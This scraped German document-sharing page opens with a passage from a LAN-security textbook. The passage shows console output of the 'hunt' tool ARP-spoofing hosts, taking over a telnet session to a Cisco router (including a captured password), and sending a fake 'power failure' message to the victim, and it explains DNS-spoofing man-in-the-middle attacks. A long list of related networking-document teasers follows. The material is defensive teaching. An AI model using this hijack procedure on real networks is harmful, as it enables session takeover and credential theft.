2528, free/alloc 63/64 ---Y--- l/w/r) list/watch/reset connections u) host up tests a) arp/simple hijack (avoids ack storm if arp used) s) simple hijack d) daemons rst/arp/sniff/mac o) options x) exit -> a 0) [1253] --> [23] 1) [49233] --> [23] choose conn> 1 hosts already ARP spoofed input mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]>

20 20 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen dump connectin y/n [y]> dump [s]rc/[d]st/[b]oth [b]> print src/dst same characters y/n [n]> CTRL-C to break eennaa Password: c router# Der Angreifer bekommt die komplette Telnet-Verbindung zwischen dem Host und dem Router angezeigt. Mit der Tastenkombination»CTRL C«übernimmt hunt die Telnet-Verbindung -- press any key> you took over the connection CTRL-] to break Zu diesem Zeitpunkt hat der Angreifer die Telnet- Verbindung übernommen. nixat2# show user Line User Host(s) Idle Location 0 con 0 idle 2d00h * 2 vty 0 idle 00:00:00 tagein.frs-lab.de Mit der Tastenkombination»CTRL ]«gibt hunt die Session wieder frei router# [r]eset connection/[s]ynchronize/[n]one [r]> s user have to type 16 chars and print 424 chars to synchronize connection CTRL-C to break done Synchronisation der Verbindung auf der Client-Seite Damit die Sequenznummern der Telnet-Verbindung wieder synchronisiert sind, bekommt der Anwender auf dem Client eine Meldung, um die fehlenden Zeichen einzugeben. msg from root: power failure - try to type 16 chars power failure detected... power resumed, ok DNS-Spoofing-Attacke DNS Spoofing kann man in lokalen Netzen sehr gut für»man-in-the-middle«-attacken einsetzen, um verschlüsselte Verbindungen (z. B. SSH oder HTTPS) auf dem angreifenden Rechner terminieren zu lassen. Dabei beantwortet der Angreifer jeden DNS Query des Zielrechners mit einem eigenen DNS Response und trägt als Reply- Adresse seine IP-Adresse ein. Da der eigentliche DNS Response des DNS-Servers in der Regel erst nach der Antwort des angreifenden Rechners auf dem Zielsystem ankommt, wird er dort ignoriert.

LAN-Sicherheit. Schwachstellen, Angriffe und Schutzmechanismen in lokalen Netzwerken - am Beispiel von Cisco Catalyst Switches. von Andreas Aurand

LAN-Sicherheit. Schwachstellen, Angriffe und Schutzmechanismen in lokalen Netzwerken - am Beispiel von Cisco Catalyst Switches. von Andreas Aurand LAN-Sicherheit Schwachstellen, Angriffe und Schutzmechanismen in lokalen Netzwerken - am Beispiel von Cisco Catalyst Switches von Andreas Aurand 1. Auflage LAN-Sicherheit Aurand schnell und portofrei erhältlich

Mehr

Grundlagen TCP/IP. C3D2 Chaostreff Dresden. Sven Klemm sven@elektro-klemm.de

Grundlagen TCP/IP. C3D2 Chaostreff Dresden. Sven Klemm sven@elektro-klemm.de Grundlagen TCP/IP C3D2 Chaostreff Dresden Sven Klemm sven@elektro-klemm.de Gliederung TCP/IP Schichtenmodell / Kapselung ARP Spoofing Relaying IP ICMP Redirection UDP TCP Schichtenmodell Protokolle der

Mehr

Hacken von implementierungsspezifischen! SSL-Schwachstellen

Hacken von implementierungsspezifischen! SSL-Schwachstellen Hacken von implementierungsspezifischen! SSL-Schwachstellen Basic-Constraints-Schwachstelle Null-Präfix-Attacke Thomas Konrad, FH St. Pölten, Studiengang IT Security, is072033@fhstp.ac.at Wozu SSL? Authentizität

Mehr

Cisco LAN Security 2B04. Agenda. Catalyst Port Security Private VLANs. DHCP Snooping Konfiguration von Switch Ports.

Cisco LAN Security 2B04. Agenda. Catalyst Port Security Private VLANs. DHCP Snooping Konfiguration von Switch Ports. Cisco LAN Security 2B04 Andreas Aurand Network Consultant NWCC, HP 2004 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice Agenda Catalyst Port

Mehr

Grundkurs Routing im Internet mit Übungen

Grundkurs Routing im Internet mit Übungen Grundkurs Routing im Internet mit Übungen Falko Dressler, Ursula Hilgers {Dressler,Hilgers}@rrze.uni-erlangen.de Regionales Rechenzentrum der FAU 1 Tag 4 Router & Firewalls IP-Verbindungen Aufbau von IP

Mehr

Vortrag Rechnernetze. Thema: Arp Spoofing. Stev Eisenhardt / Inf04. Seite 1

Vortrag Rechnernetze. Thema: Arp Spoofing. Stev Eisenhardt / Inf04. Seite 1 Vortrag Rechnernetze Thema: Arp Spoofing Von: Stev Eisenhardt / Inf04 Seite 1 Übersicht: Definitionen Seite 3 Arten von Spoofing Seite 4 Praktische Beispiele.. Seite 7 Spoofing von SSL Verbindungen.. Seite

Mehr

ITELLIUM Systems & Services GmbH der IT Dienstleister der KarstadtQuelle AG

ITELLIUM Systems & Services GmbH der IT Dienstleister der KarstadtQuelle AG Schutz vor ARP-Spoofing Gereon Rütten und Oliver Stutzke Hamburg, 04.02.2004 ITELLIUM Systems & Services GmbH der IT Dienstleister der KarstadtQuelle AG Agenda Einleitung ARP-Spoofing Erkennung von ARP-Spoofing

Mehr

Netzwerksicherheit ARP-Spoofing

Netzwerksicherheit ARP-Spoofing Netzwerksicherheit ARP-Spoofing Tobias Limmer, Martin Gründl, Thomas Schneider Computer Networks and Communication Systems Dept. of Computer Sciences, University of Erlangen-Nuremberg, Germany 18. 20.12.2007

Mehr

VLAN Security 3B04. Andreas Aurand Network Consultant HP NWCC. DECUS Symposium 2003. Warum Ethernet Security? Mögliche Angriffsszenarien MAC-Angriffe

VLAN Security 3B04. Andreas Aurand Network Consultant HP NWCC. DECUS Symposium 2003. Warum Ethernet Security? Mögliche Angriffsszenarien MAC-Angriffe VLAN Security 3B04 Andreas Aurand Network Consultant HP NWCC DECUS Symposium 2003 Agenda Warum Ethernet Security? Mögliche Angriffsszenarien MAC-Angriffe MAC Flooding MAC Spoofing Port Security IEEE 802.1X

Mehr

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein: - Grundkonfiguration des Routers. - Ein Bootimage ab Version 7.4.x.

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein: - Grundkonfiguration des Routers. - Ein Bootimage ab Version 7.4.x. 7. PPPoE Server 7.1 Einleitung Im Folgenden wird die Konfiguration einer Dialin Verbindung über PPPoE zum Router beschrieben, um eine zusätzliche Authentifizierung durchzuführen. Bei der Einwahl eines

Mehr

Stefan Dahler. 1. Konfiguration der Stateful Inspection Firewall. 1.1 Einleitung

Stefan Dahler. 1. Konfiguration der Stateful Inspection Firewall. 1.1 Einleitung 1. Konfiguration der Stateful Inspection Firewall 1.1 Einleitung Im Folgenden wird die Konfiguration der Stateful Inspection Firewall beschrieben. Es werden Richtlinien erstellt, die nur den Internet Verkehr

Mehr

Digitale Signatur. Digitale Signatur. Anwendungen der Kryptographie. Secret Sharing / Splitting. Ziele SSL / TLS

Digitale Signatur. Digitale Signatur. Anwendungen der Kryptographie. Secret Sharing / Splitting. Ziele SSL / TLS Digitale Signatur Digitale Signatur kombiniert Hash Funktion und Signatur M, SIGK(HASH(M)) wichtige Frage: Wie wird der Bithaufen M interpretiert Struktur von M muss klar definiert sein Wie weiss ich,

Mehr

IEEE 802.1x, Dynamic ARP Inspection und DHCP Snooping. von Thorsten Dahm 08.06.2006 t.dahm@resolution.de

IEEE 802.1x, Dynamic ARP Inspection und DHCP Snooping. von Thorsten Dahm 08.06.2006 t.dahm@resolution.de IEEE 802.1x, Dynamic ARP Inspection und DHCP Snooping von Thorsten Dahm 08.06.2006 t.dahm@resolution.de 1) Was Euch hier erwartet 1) Was ist 802.1x Wozu braucht man's? Möglichkeiten Artenreichtum: Authentifizierung

Mehr

IP Adressen & Subnetzmasken

IP Adressen & Subnetzmasken IP Adressen & Subnetzmasken Jörn Stuphorn stuphorn@rvs.uni-bielefeld.de Universität Bielefeld Technische Fakultät Stand der Veranstaltung 13. April 2005 Unix-Umgebung 20. April 2005 Unix-Umgebung 27. April

Mehr

Denn es geht um ihr Geld:

Denn es geht um ihr Geld: Denn es geht um ihr Geld: [A]symmetrische Verschlüsselung, Hashing, Zertifikate, SSL/TLS Warum Verschlüsselung? Austausch sensibler Daten über das Netz: Adressen, Passwörter, Bankdaten, PINs,... Gefahr

Mehr

Multicast & Anycast. Jens Link FFG2012. jenslink@quux.de. Jens Link (jenslink@quux.de) Multicast & Anycast 1 / 29

Multicast & Anycast. Jens Link FFG2012. jenslink@quux.de. Jens Link (jenslink@quux.de) Multicast & Anycast 1 / 29 Multicast & Anycast Jens Link jenslink@quux.de FFG2012 Jens Link (jenslink@quux.de) Multicast & Anycast 1 / 29 Übersicht 1 Multicast 2 Anycast Jens Link (jenslink@quux.de) Multicast & Anycast 2 / 29 Wer

Mehr

Befehlsreferenz. Copyright Stefan Dahler 11. Oktober 2010 Version 3.0. Seite - 1 -

Befehlsreferenz. Copyright Stefan Dahler 11. Oktober 2010 Version 3.0. Seite - 1 - Befehlsreferenz Copyright Stefan Dahler 11. Oktober 2010 Version 3.0 Seite - 1 - 12. Befehlsreferenz ps Optionen Bedeutung -e Listet alle Prozesse -f Komplette Liste -j Gibt Prozessgruppen-ID aus -l Lange

Mehr

NAT und Firewalls. Jörn Stuphorn stuphorn@rvs.uni-bielefeld.de. Universität Bielefeld Technische Fakultät

NAT und Firewalls. Jörn Stuphorn stuphorn@rvs.uni-bielefeld.de. Universität Bielefeld Technische Fakultät NAT und Firewalls Jörn Stuphorn stuphorn@rvs.uni-bielefeld.de Universität Bielefeld Technische Fakultät Stand der Veranstaltung 13. April 2005 Unix-Umgebung 20. April 2005 Unix-Umgebung 27. April 2005

Mehr

Workshop Sicherheit im Netz KZO Wetzikon. Peter Skrotzky, 4. Dezember 2013

Workshop Sicherheit im Netz KZO Wetzikon. Peter Skrotzky, 4. Dezember 2013 Workshop Sicherheit im Netz KZO Wetzikon Peter Skrotzky, 4. Dezember 2013 Zentrale Fragen! Wie kann sich jemand zu meinem Computer Zugriff verschaffen?! Wie kann jemand meine Daten abhören oder manipulieren?!

Mehr

Scan-Techniken Ein Überblick

Scan-Techniken Ein Überblick Scan-Techniken Ein Überblick Klaus Möller DFN-CERT GmbH Februar 2002 Agenda Was sind Scans? Scan-Techniken ICMP Scans TCP Scans UDP Scans Weitere Scan-Techniken Umgang mit Scans Was sind Scans? Einbruchszyklus:

Mehr

Netzwerktechnik Cisco CCNA

Netzwerktechnik Cisco CCNA BBU NPA Übung 9 Stand: 07.01.2013 Zeit Lernziele Laborübung 60 min Grundkonfiguration eines Switches Erstellen einer Grundkonfiguration für einen Switch Löschen einer Konfiguration und Laden einer Konfiguration

Mehr

bintec Workshop Dynamic Host Configuration Protocol Copyright 8. November 2005 Funkwerk Enterprise Communications GmbH Version 0.9

bintec Workshop Dynamic Host Configuration Protocol Copyright 8. November 2005 Funkwerk Enterprise Communications GmbH Version 0.9 bintec Workshop Dynamic Host Configuration Protocol Copyright 8. November 2005 Funkwerk Enterprise Communications GmbH Version 0.9 Ziel und Zweck Haftung Marken Copyright Richtlinien und Normen Wie Sie

Mehr

ICMP Internet Control Message Protocol. Michael Ziegler

ICMP Internet Control Message Protocol. Michael Ziegler ICMP Situation: Komplexe Rechnernetze (Internet, Firmennetze) Netze sind fehlerbehaftet Viele verschiedene Fehlerursachen Administrator müsste zu viele Fehlerquellen prüfen Lösung: (ICMP) Teil des Internet

Mehr

Remote Tools. SFTP Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de

Remote Tools. SFTP Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de Remote Tools SSH SCP Proxy SFTP Port X11 christina.zeeh@studi.informatik.uni-stuttgart.de Grundlagen SSH Inhalt Remote-Login auf marvin Datentransfer Graphische Anwendungen Tunnel VPN SSH für Fortgeschrittene

Mehr

Rosa Freund SSL/TLS 26.10.2005 SSL/TLS 26.10.2005. Institut für Mathematik, TU Berlin. Rosa Freund -- rosa@pool.math.tu-berlin.de

Rosa Freund SSL/TLS 26.10.2005 SSL/TLS 26.10.2005. Institut für Mathematik, TU Berlin. Rosa Freund -- rosa@pool.math.tu-berlin.de 1 SSL/TLS 26.10.2005 Institut für Mathematik, TU Berlin Rosa Freund -- rosa@pool.math.tu-berlin.de 2 Übersicht Einführung SSL vs. TLS SSL: Anwendung und PKI SSL Protokoll: Record Protocol und Handshake

Mehr

Remote Tools SFTP. Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de

Remote Tools SFTP. Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de Proxy Remote Tools SFTP SSH X11 Port SCP christina.zeeh@studi.informatik.uni-stuttgart.de Inhalt Grundlagen SSH Remote-Login auf marvin Datentransfer Graphische Anwendungen Tunnel VPN SSH für Fortgeschrittene

Mehr

Netzwerk Teil 2 Linux-Kurs der Unix-AG

Netzwerk Teil 2 Linux-Kurs der Unix-AG Netzwerk Teil 2 Linux-Kurs der Unix-AG Zinching Dang 17. Juni 2015 Unterschied Host Router Standardverhalten eines Linux-Rechners: Host nur IP-Pakete mit Zieladressen, die dem Rechner zugeordnet sind,

Mehr

shri Raw Sockets Prof. Dr. Ch. Reich

shri Raw Sockets Prof. Dr. Ch. Reich shri Raw Sockets Prof. Dr. Ch. Reich Szenario: Verschicken einer gespooften Ping-Message IP-Source-Adresse ist Adresse des Opfers Nachrichtenformat: IP-Header (normal, außer IP-Source-Address ist einstellbar)

Mehr

How to install freesshd

How to install freesshd Enthaltene Funktionen - Installation - Benutzer anlegen - Verbindung testen How to install freesshd 1. Installation von freesshd - Falls noch nicht vorhanden, können Sie das Freeware Programm unter folgendem

Mehr

Konfigurationsanleitung Access Control Lists (ACL) Funkwerk. Copyright Stefan Dahler - www.neo-one.de 13. Oktober 2008 Version 1.0.

Konfigurationsanleitung Access Control Lists (ACL) Funkwerk. Copyright Stefan Dahler - www.neo-one.de 13. Oktober 2008 Version 1.0. Konfigurationsanleitung Access Control Lists (ACL) Funkwerk Copyright Stefan Dahler - www.neo-one.de 13. Oktober 2008 Version 1.0 Seite - 1 - 1. Konfiguration der Access Listen 1.1 Einleitung Im Folgenden

Mehr

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein:

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein: 13. Secure Socket Layer (SSL) VPN 13.1 Einleitung Sie konfigurieren das Feature SSL VPN für den Zugriff eines Clients auf das Firmennetzwerk. Die UTM in der Zetrale stellt Zertifikate für die VPN Clients

Mehr

Installation Manual. Plattformdokumentation. Universitätsstraße 3 56070 Koblenz Deutschland VERSION: 9.0

Installation Manual. Plattformdokumentation. Universitätsstraße 3 56070 Koblenz Deutschland VERSION: 9.0 Installation Manual DOKUMENT: TYP: Installation Manual Plattformdokumentation ERSTELLT VON: nova ratio AG Universitätsstraße 3 56070 Koblenz Deutschland VERSION: 9.0 STAND: 28. August 2015 Inhaltsverzeichnis

Mehr

Firewall Implementierung unter Mac OS X

Firewall Implementierung unter Mac OS X Firewall Implementierung unter Mac OS X Mac OS X- Firewall: Allgemeines * 2 Firewall- Typen: * ipfw * programmorientierte Firewall * 3 Konfigurations- Möglichkeiten * Systemeinstellungen * Dritthersteller-

Mehr

1KONFIGURATION VON ACCESS LISTEN UND FILTERN

1KONFIGURATION VON ACCESS LISTEN UND FILTERN 1KONFIGURATION VON ACCESS LISTEN UND FILTERN Copyright 23. Juni 2005 Funkwerk Enterprise Communications GmbH Bintec Workshop Version 0.9 Ziel und Zweck Haftung Marken Copyright Richtlinien und Normen Wie

Mehr

So wird der administrative Aufwand bei der Konfiguration von Endgeräten erheblich reduziert.

So wird der administrative Aufwand bei der Konfiguration von Endgeräten erheblich reduziert. 11.2 Cisco und DHCP.. nur teilweise CCNA relevant DHCP Dynamic Host Configuration Protocol ist der Nachfolger des BOOTP Protokolls und wird verwendet um anfrandenen Hosts dynamisch IP Parameter - i.d.r.

Mehr

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein:

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein: 1. Access Point im Personal Mode (WEP / WPA / WPA2) 1.1 Einleitung Im Folgenden wird die Konfiguration des Access Point Modus gezeigt. Zur Absicherung der Daten werden die verschiedenen Verschlüsselungsalgorithmen

Mehr

Netzwerksicherheit Übung 5 Transport Layer Security

Netzwerksicherheit Übung 5 Transport Layer Security Netzwerksicherheit Übung 5 Transport Layer Security Tobias Limmer, Christoph Sommer, David Eckhoff Computer Networks and Communication Systems Dept. of Computer Science, University of Erlangen-Nuremberg,

Mehr

Konfigurationsanleitung Network Address Translation (NAT) Funkwerk. Seite - 1 - Copyright Stefan Dahler - www.neo-one.de 13. Oktober 2008 Version 1.

Konfigurationsanleitung Network Address Translation (NAT) Funkwerk. Seite - 1 - Copyright Stefan Dahler - www.neo-one.de 13. Oktober 2008 Version 1. Konfigurationsanleitung Network Address Translation (NAT) Funkwerk Copyright Stefan Dahler - www.neo-one.de 13. Oktober 2008 Version 1.1 Seite - 1 - 1. Konfiguration von Network Address Translation 1.1

Mehr

Ch. 6 Switch Konfiguration

Ch. 6 Switch Konfiguration Ch. 6 Switch Konfiguration CCNA 3 version 3.0 Wolfgang Riggert,, FH Flensburg nach Rick Graziani, Cabrillo College Vorbemerkung Die englische Originalversion finden Sie unter : http://www.cabrillo.cc.ca.us/~rgraziani/

Mehr

Grundlagen Firewall und NAT

Grundlagen Firewall und NAT Grundlagen Firewall und NAT Was sind die Aufgaben einer Firewall? Welche Anforderungen sind zu definieren? Grundlegende Funktionsweise Technische Varianten NA[P]T Portmapping Übungsaufgabe Quellen im WWW

Mehr

Security. Stefan Dahler. 4. Internet Verbindung. 4.1 Einleitung

Security. Stefan Dahler. 4. Internet Verbindung. 4.1 Einleitung 4. Internet Verbindung 4.1 Einleitung Im Folgenden wird die Konfiguration der DFL-800 Firewall gezeigt. Sie konfigurieren einen Internet Zugang zum Provider mit dem Protokoll PPPoE. In der Firewallrichtlinie

Mehr

1.) Nennen Sie Aufgaben und mögliche Dienste der Transportschicht (Transport Layer) des ISO/OSI-Schichtenmodells.

1.) Nennen Sie Aufgaben und mögliche Dienste der Transportschicht (Transport Layer) des ISO/OSI-Schichtenmodells. Übung 7 1.) Nennen Sie Aufgaben und mögliche Dienste der Transportschicht (Transport Layer) des ISO/OSI-Schichtenmodells. 2.) Charakterisieren Sie kurz das User Datagram Protokoll (UDP) aus der Internetprotokollfamilie

Mehr

Remote Tools. SFTP Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de

Remote Tools. SFTP Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de Remote Tools SSH SCP Proxy SFTP Port X11 christina.zeeh@studi.informatik.uni-stuttgart.de Grundlagen IP-Adresse 4x8 = 32 Bit Unterteilung des Adressraumes in Subnetze (Uni: 129.69.0.0/16) 129.69.212.19

Mehr

DHCP Grundlagen 1. DHCP - Protokoll. Dynamic Host Configuration Protocol. DHCP Grundlagen 2. DHCP Varianten

DHCP Grundlagen 1. DHCP - Protokoll. Dynamic Host Configuration Protocol. DHCP Grundlagen 2. DHCP Varianten DHCP - Protokoll DHCP Grundlagen 1 Automatische Zuweisung von Netzwerkeinstellungen (Konfigurationsdaten) für Hosts durch einen DHCP-Server Bei DHCP ist keine manuelle Konfiguration der Hosts erforderlich

Mehr

Anforderungen an elektronische Signaturen. Michel Messerschmidt

Anforderungen an elektronische Signaturen. Michel Messerschmidt Anforderungen an elektronische Signaturen Michel Messerschmidt Übersicht Kryptographische Grundlagen Rechtliche Grundlagen Praxis Michel Messerschmidt, 2006-03-16 2 Kryptographische Grundlagen Verschlüsselung

Mehr

SSL/TLS und SSL-Zertifikate

SSL/TLS und SSL-Zertifikate SSL/TLS und SSL-Zertifikate Konzepte von Betriebssystem-Komponenten Informatik Lehrstuhl 4 16.06.10 KvBK Wolfgang Hüttenhofer sethur_blackcoat@web.de Motivation Sichere, verschlüsselte End-to-End Verbindung

Mehr

Seminar Neue Techologien in Internet und WWW

Seminar Neue Techologien in Internet und WWW Seminar Neue Techologien in Internet und WWW Sicherheit auf der Anwendungsschicht: HTTP mit SSL, TLS und dabei verwendete Verfahren Christian Raschka chrisra@informatik.uni-jena.de Seminar Neue Internettechnologien

Mehr

Netzwerk Linux-Kurs der Unix-AG

Netzwerk Linux-Kurs der Unix-AG Netzwerk Linux-Kurs der Unix-AG Benjamin Eberle 5. Februar 2015 Netzwerke mehrere miteinander verbundene Geräte (z. B. Computer) bilden ein Netzwerk Verbindung üblicherweise über einen Switch (Ethernet)

Mehr

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools jochen.schlichting@secorvo.de Seite 1 Inhalt Einführung: Typische Angriffe

Mehr

Einleitung Sniffing, Analyzing, Scanning Scanning. Netzwerke. Bierfert, Feresst, Günther, Schuster. 21. März 2006

Einleitung Sniffing, Analyzing, Scanning Scanning. Netzwerke. Bierfert, Feresst, Günther, Schuster. 21. März 2006 Sniffing, Analyzing, 21. März 2006 Sniffing, Analyzing, Sniffing, Analyzing, Transmission Control Protocol (RFC 793) Zwei Endpunkte, bezeichnet mit Server und Client Server und Client aus je einem geordneten

Mehr

Sicherheitskonzept und Sicherheitspru fung. Internetanbindung Befundserver MVZ Labor PD Dr. Volkmann und Kollegen GbR

Sicherheitskonzept und Sicherheitspru fung. Internetanbindung Befundserver MVZ Labor PD Dr. Volkmann und Kollegen GbR Sicherheitskonzept und Sicherheitspru fung Internetanbindung Befundserver MVZ Labor PD Dr. Volkmann und Kollegen GbR Einführung Die Firma MVZ Labor PD Dr. Volkmann und Kollegen GbR, nachstehend als Labor

Mehr

Masterarbeit über IPv6 Security: http://blog.webernetz.net/2013/05/06/ipv6-security-master-thesis/ Xing:

Masterarbeit über IPv6 Security: http://blog.webernetz.net/2013/05/06/ipv6-security-master-thesis/ Xing: 1 Masterarbeit über IPv6 Security: http://blog.webernetz.net/2013/05/06/ipv6-security-master-thesis/ Xing: https://www.xing.com/profile/johannes_weber65 2 3 4 Kernproblem: Wer hatte wann welche IPv6-Adresse?

Mehr

Netzwerkanalyse Seite 1 von 6. Einführung in die Netzwerkanalyse

Netzwerkanalyse Seite 1 von 6. Einführung in die Netzwerkanalyse Netzwerkanalyse Seite 1 von 6 Einführung in die Netzwerkanalyse Unter Netzwerkanalyse versteht man einen Prozess, bei dem der Netzwerk-Traffic abgegriffen und genau untersucht wird, um festzustellen, was

Mehr

Load balancing Router with / mit DMZ

Load balancing Router with / mit DMZ ALL7000 Load balancing Router with / mit DMZ Deutsch Seite 3 English Page 10 ALL7000 Quick Installation Guide / Express Setup ALL7000 Quick Installation Guide / Express Setup - 2 - Hardware Beschreibung

Mehr

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein:

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein: 7. Intrusion Prevention System 7.1 Einleitung Sie konfigurieren das Intrusion Prevention System um das Netzwerk vor Angriffen zu schützen. Grundsätzlich soll nicht jeder TFTP Datenverkehr blockiert werden,

Mehr

Inhalt. Erreichbarkeit von VPN-Gateways hinter einem Genexis FTTH-Abschlussrouter

Inhalt. Erreichbarkeit von VPN-Gateways hinter einem Genexis FTTH-Abschlussrouter Dieses Dokument beschreibt die notwendigen Einstellungen, um ein VPN-Gateway hinter einer Genexis OCG-218M/OCG-2018M und HRG1000 LIVE! TITANIUM trotz NAT-Funktion erreichbar zu machen. Inhalt 1 OCG-218M/OCG-2018M...

Mehr

Private VLAN's! Vom Providernetz zum Schulnetzwerk!

Private VLAN's! Vom Providernetz zum Schulnetzwerk! Private VLAN's Vom Providernetz zum Schulnetzwerk 13.05.2012 uwe.starke@hs-wismar.de 1 Agenda PVLAN- Theorie Rules and Limitations Configuration Steps Zusammenfassung PVLAN-LAB 13.05.2012 uwe.starke@hs-wismar.de

Mehr

Der Widerspenstigen Zähmung Unmanaged IPv6 im lokalen Netz und die Gefahren

Der Widerspenstigen Zähmung Unmanaged IPv6 im lokalen Netz und die Gefahren Der Widerspenstigen Zähmung Unmanaged IPv6 im lokalen Netz und die Gefahren 19. DFN-CERT-Workshop 2012 Inhaltsübersicht Dual Stack Implementierungen Native IPv6 Windows, Linux, MacOS X Technik - Autoconfiguration

Mehr

Gedächtnisprtokoll für NPA-Klausur

Gedächtnisprtokoll für NPA-Klausur Gedächtnisprtokoll für NPA-Klausur Wintersemester 2012/13 23. Februar 2013 Hinweise Als Hilfsmittel ist nur ein doppelseitg geschriebenes/gedrucktes DIN-A4 Blatt. Nichts Anders! Es gibt insgesamt 100 Punkte,

Mehr

Netzwerk-Akademie-Konzept

Netzwerk-Akademie-Konzept Netzwerk-Akademie-Konzept Netzwerk-Sicherheit in der CCNA- Ausbildung an der Kurzer Blick auf das Akademie-Konzept CATC Regionale Akademien Lokale Akademien CATC Cisco Academic Training Center Betreut

Mehr

DynDNS für Strato Domains im Eigenbau

DynDNS für Strato Domains im Eigenbau home.meinedomain.de DynDNS für Strato Domains im Eigenbau Hubert Feyrer Hubert Feyrer 1 Intro homerouter$ ifconfig pppoe0 pppoe0: flags=8851...

Mehr

HowTo für ein VPN mit X.509 Zertifikaten Intranator <=> Lancom (LCOS v6.x)

HowTo für ein VPN mit X.509 Zertifikaten Intranator <=> Lancom (LCOS v6.x) HowTo für ein VPN mit X.509 Zertifikaten Intranator Lancom (LCOS v6.x) Zeitabgleich Die LANCOM überprüft bei der Authentifizierung auch den Gültigkeitszeitraum des Zertifikats. Daher muss die Systemzeit

Mehr

Wie organisiert ihr Euer menschliches «Netzwerk» für folgende Aufgaben? an alle an ein bestimmtes an ein bestimmtes an alle an ein bestimmtes

Wie organisiert ihr Euer menschliches «Netzwerk» für folgende Aufgaben? an alle an ein bestimmtes an ein bestimmtes an alle an ein bestimmtes Computernetzwerke Praxis - Welche Geräte braucht man für ein Computernetzwerk und wie funktionieren sie? - Protokolle? - Wie baue/organisiere ich ein eigenes Netzwerk? - Hacking und rechtliche Aspekte.

Mehr

UDP-, MTU- und IP- Fragmentierung

UDP-, MTU- und IP- Fragmentierung UDP-, MTU- und IP- Fragmentierung Jörn Stuphorn stuphorn@rvs.uni-bielefeld.de Universität Bielefeld Technische Fakultät Stand der Veranstaltung 13. April 2005 Unix-Umgebung 20. April 2005 Unix-Umgebung

Mehr

DHCP und dynamischer Update eines DNS

DHCP und dynamischer Update eines DNS DHCP und dynamischer Update eines DNS Als Voraussetzung für diese Dokumentation wird eine funktionierende Konfiguration eines DNS Servers, mit den entsprechenden Zonefiles angenommen. Die hier verwendete

Mehr

TCP/IP-Protokollfamilie

TCP/IP-Protokollfamilie TCP/IP-Protokollfamilie Internet-Protokolle Mit den Internet-Protokollen kann man via LAN- oder WAN kommunizieren. Die bekanntesten Internet-Protokolle sind das Transmission Control Protokoll (TCP) und

Mehr

Domain Name Service (DNS)

Domain Name Service (DNS) Domain Name Service (DNS) Aufgabe: den numerischen IP-Adressen werden symbolische Namen zugeordnet Beispiel: 194.94.127.196 = www.w-hs.de Spezielle Server (Name-Server, DNS) für Listen mit IP-Adressen

Mehr

MultiNET Services GmbH. iptables. Fachhochschule München, 13.6.2009. Dr. Michael Schwartzkopff, MultiNET Services GmbH

MultiNET Services GmbH. iptables. Fachhochschule München, 13.6.2009. Dr. Michael Schwartzkopff, MultiNET Services GmbH MultiNET Services GmbH iptables Fachhochschule München, 13.6.2009 Dr. Michael Schwartzkopff, MultiNET Services GmbH MultiNET Services GmbH: iptables: Seite 1 Entwicklung von Paketfiltern Seit es Internet

Mehr

Secure Sockets Layer (SSL) Prof. Dr. P. Trommler

Secure Sockets Layer (SSL) Prof. Dr. P. Trommler Secure Sockets Layer (SSL) Prof. Dr. P. Trommler Übersicht Internetsicherheit Protokoll Sitzungen Schlüssel und Algorithmen vereinbaren Exportversionen Public Keys Protokollnachrichten 29.10.2003 Prof.

Mehr

SSH. Nun brauchen wir noch das passwd-file. Dieses erstellen wir mit folgendem Befehl: mkpasswd -k -u marco >>..\etc\passwd

SSH. Nun brauchen wir noch das passwd-file. Dieses erstellen wir mit folgendem Befehl: mkpasswd -k -u marco >>..\etc\passwd SSH 1 Grundlagen... 1 2 Authentifizierung... 1 3 Installation von OpenSSH for Windows... 1 3.1 Anmeldung mit Schlüsselpaar... 3 4 SSH-Tunnel... 4 4.1 Funktionsweise... 5 4.2 Remote-Desktop durch einen

Mehr

TCP/UDP. Transport Layer

TCP/UDP. Transport Layer TCP/UDP Transport Layer Lernziele 1. Wozu dient die Transportschicht? 2. Was passiert in der Transportschicht? 3. Was sind die wichtigsten Protkolle der Transportschicht? 4. Wofür wird TCP eingesetzt?

Mehr

1. Praktikumsaufgabe zur IT-Sicherheit 2

1. Praktikumsaufgabe zur IT-Sicherheit 2 Prof. Dr. Heiko Knospe SS 2004 1. Praktikumsaufgabe zur IT-Sicherheit 2 X.509 Zertifikate In praktischen Teil dieses Versuchs werden mit Hilfe des OpenSSL Paketes unter Linux X.509 Zertifikate erzeugt

Mehr

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung 6. Zone Defense 6.1 Einleitung Im Folgenden wird die Konfiguration von Zone Defense gezeigt. Sie verwenden einen Rechner für die Administration, den anderen für Ihre Tests. In der Firewall können Sie entweder

Mehr

Verlässliche Verteilte Systeme 1. Prof. Dr. Felix Gärtner

Verlässliche Verteilte Systeme 1. Prof. Dr. Felix Gärtner Verlässliche Verteilte Systeme 1 Angewandte IT-Robustheit und IT-Sicherheit Vorlesung im Wintersemester 2004/2005 Prof. Dr. Felix Gärtner Teil 14: Schwächen von und Angriffe auf die Internet-Protokolle

Mehr

Problembehandlung bei Windows2000- Netzwerkdiensten

